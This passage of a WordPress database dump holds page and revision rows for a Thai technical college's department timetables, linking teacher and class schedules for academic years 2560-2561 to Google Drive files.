(2238, 4, '2018-05-06 22:28:41', '2018-05-06 15:28:41', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1XZFoP9L7lisH5J-j0xdwgT0Pg7nyNmu3\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเครื่องมือวัดและควบคุม', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7', '', '', '2018-05-15 04:38:05', '2018-05-14 21:38:05', '', 0, 'http://www.technicrayong.ac.th/?page_id=2238', 0, 'page', '', 0),
(2240, 4, '2018-05-06 22:28:41', '2018-05-06 15:28:41', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเครื่องมือวัดและควบคุม', '', 'inherit', 'closed', 'closed', '', '2238-revision-v1', '', '', '2018-05-06 22:28:41', '2018-05-06 15:28:41', '', 2238, 'http://www.technicrayong.ac.th/2238-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2243, 4, '2018-05-06 22:29:44', '2018-05-06 15:29:44', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1UehVc3kQSCwR-0iU_DrjBuwM8lENcqTF\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1BszDXWLV_blN1Ouaej4U7Dh4CD94RUOq\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1A6EOADOCHVi7kojV1eOxTVvQ2Kp4rq6b\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกปิโตรเคมี', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%9b%e0%b8%b4%e0%b9%82%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5', '', '', '2018-09-28 03:53:00', '2018-09-27 20:53:00', '', 0, 'http://www.technicrayong.ac.th/?page_id=2243', 0, 'page', '', 0),
(2244, 4, '2018-05-06 22:29:44', '2018-05-06 15:29:44', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '2243-revision-v1', '', '', '2018-05-06 22:29:44', '2018-05-06 15:29:44', '', 2243, 'http://www.technicrayong.ac.th/2243-revision-v1/', 0, 'revision', '', 0),
(2246, 4, '2018-05-06 22:30:37', '2018-05-06 15:30:37', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1LCGiXrudvYOJQ-bLUJR1u2vMFsC9z2Np\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเคมีอุตสาหกรรม', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2', '', '', '2018-05-15 04:36:39', '2018-05-14 21:36:39', '', 0, 'http://www.technicrayong.ac.th/?page_id=2246', 0, 'page', '', 0),
(2247, 4, '2018-05-06 22:30:37', '2018-05-06 15:30:37', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเคมีอุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '2246-revision-v1', '', '', '2018-05-06 22:30:37', '2018-05-06 15:30:37', '', 2246, 'http://www.technicrayong.ac.th/2246-revision-v1/', 0, 'revision', '', 0),
(2250, 4, '2018-05-06 22:31:40', '2018-05-06 15:31:40', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Q4gTiQb2EF_IAwwNWXUadRokrUfMPBGo\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกเทคโนโลยียาง', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%87', '', '', '2018-05-15 04:40:13', '2018-05-14 21:40:13', '', 0, 'http://www.technicrayong.ac.th/?page_id=2250', 0, 'page', '', 0),
(2251, 4, '2018-05-06 22:31:40', '2018-05-06 15:31:40', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกเทคโนโลยียาง', '', 'inherit', 'closed', 'closed', '', '2250-revision-v1', '', '', '2018-05-06 22:31:40', '2018-05-06 15:31:40', '', 2250, 'http://www.technicrayong.ac.th/2250-revision-v1/', 0, 'revision', '', 0),
(2254, 4, '2018-05-06 22:32:42', '2018-05-06 15:32:42', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเทคนิคพื้นฐาน', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%9e%e0%b8%b7%e0%b9%89', '', '', '2018-05-06 22:32:42', '2018-05-06 15:32:42', '', 0, 'http://www.technicrayong.ac.th/?page_id=2254', 0, 'page', '', 0),
(2255, 4, '2018-05-06 22:32:42', '2018-05-06 15:32:42', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเทคนิคพื้นฐาน', '', 'inherit', 'closed', 'closed', '', '2254-revision-v1', '', '', '2018-05-06 22:32:42', '2018-05-06 15:32:42', '', 2254, 'http://www.technicrayong.ac.th/2254-revision-v1/', 0, 'revision', '', 0),
(2256, 4, '2018-05-06 22:32:50', '2018-05-06 15:32:50', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเทคนิคพื้นฐาน', '', 'inherit', 'closed', 'closed', '', '2254-autosave-v1', '', '', '2018-05-06 22:32:50', '2018-05-06 15:32:50', '', 2254, 'http://www.technicrayong.ac.th/2254-autosave-v1/', 0, 'revision', '', 0),
(2257, 4, '2018-05-06 22:33:16', '2018-05-06 15:33:16', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5%E0%B9%82%E0%B8%A3%E0%B8%87/\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD/\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2/\">แผนกวิชาช่างไฟฟ้ากำลัง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87/\">แผนกวิชาช่างอิเล็กทรอนิกส์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3/\">แผนกวิชาช่างก่อสร้าง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7/\">แผนกวิชาเครื่องมือวัดและควบคุม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5/\">แผนกวิชาปิโตรเคมี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2/\">แผนกวิชาเคมีอุตสาหกรรม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87/\">แผนกวิชาเทคโนโลยียาง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84%E0%B8%9E%E0%B8%B7%E0%B9%89/\">แผนกวิชาเทคนิคพื้นฐาน</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการบัญชี</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการจัดการโลจิสติกส์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาคหกรรมศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาอาหารและโภชนาการ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการท่องเที่ยว</p>\r\n<p style=\"padding-left: 30px;\">แผนกวิชาการโรงแรม</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">สาขาวิชาเทคโนโลยีสารสนเทศ</p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\">หมวดวิชาวิทยาศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาคณิตศาสตร์</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาอังกฤษ</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาสังคมศึกษา</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาภาษาไทย</p>\r\n<p style=\"padding-left: 30px;\">หมวดวิชาพลานามัย</p>', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:33:16', '2018-05-06 15:33:16', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2258, 4, '2018-05-06 22:34:39', '2018-05-06 15:34:39', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1kHu5BCORMmylm-mynHbBdRrEQyCZtcmI\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการบัญชี', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8a%e0%b8%b5', '', '', '2018-05-15 04:50:49', '2018-05-14 21:50:49', '', 0, 'http://www.technicrayong.ac.th/?page_id=2258', 0, 'page', '', 0),
(2259, 4, '2018-05-06 22:34:39', '2018-05-06 15:34:39', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการบัญชี', '', 'inherit', 'closed', 'closed', '', '2258-revision-v1', '', '', '2018-05-06 22:34:39', '2018-05-06 15:34:39', '', 2258, 'http://www.technicrayong.ac.th/2258-revision-v1/', 0, 'revision', '', 0),
(2262, 4, '2018-05-06 22:36:15', '2018-05-06 15:36:15', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1HZz4VHNW6t3Wb_yIA7M1Vvldc0MVjJ0i\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%a5%e0%b8%b2%e0%b8%94-%e0%b8%81%e0%b8%b2', '', '', '2018-05-15 04:29:43', '2018-05-14 21:29:43', '', 0, 'http://www.technicrayong.ac.th/?page_id=2262', 0, 'page', '', 0),
(2263, 4, '2018-05-06 22:36:15', '2018-05-06 15:36:15', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก', '', 'inherit', 'closed', 'closed', '', '2262-revision-v1', '', '', '2018-05-06 22:36:15', '2018-05-06 15:36:15', '', 2262, 'http://www.technicrayong.ac.th/2262-revision-v1/', 0, 'revision', '', 0),
(2266, 4, '2018-05-06 22:37:10', '2018-05-06 15:37:10', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1hfrmkgAR_J5bs1__VA_9B9oAAMpz8zuv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการเลขานุการ/การจัดการสำนักงาน', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a5%e0%b8%82%e0%b8%b2%e0%b8%99%e0%b8%b8', '', '', '2018-05-15 04:44:12', '2018-05-14 21:44:12', '', 0, 'http://www.technicrayong.ac.th/?page_id=2266', 0, 'page', '', 0),
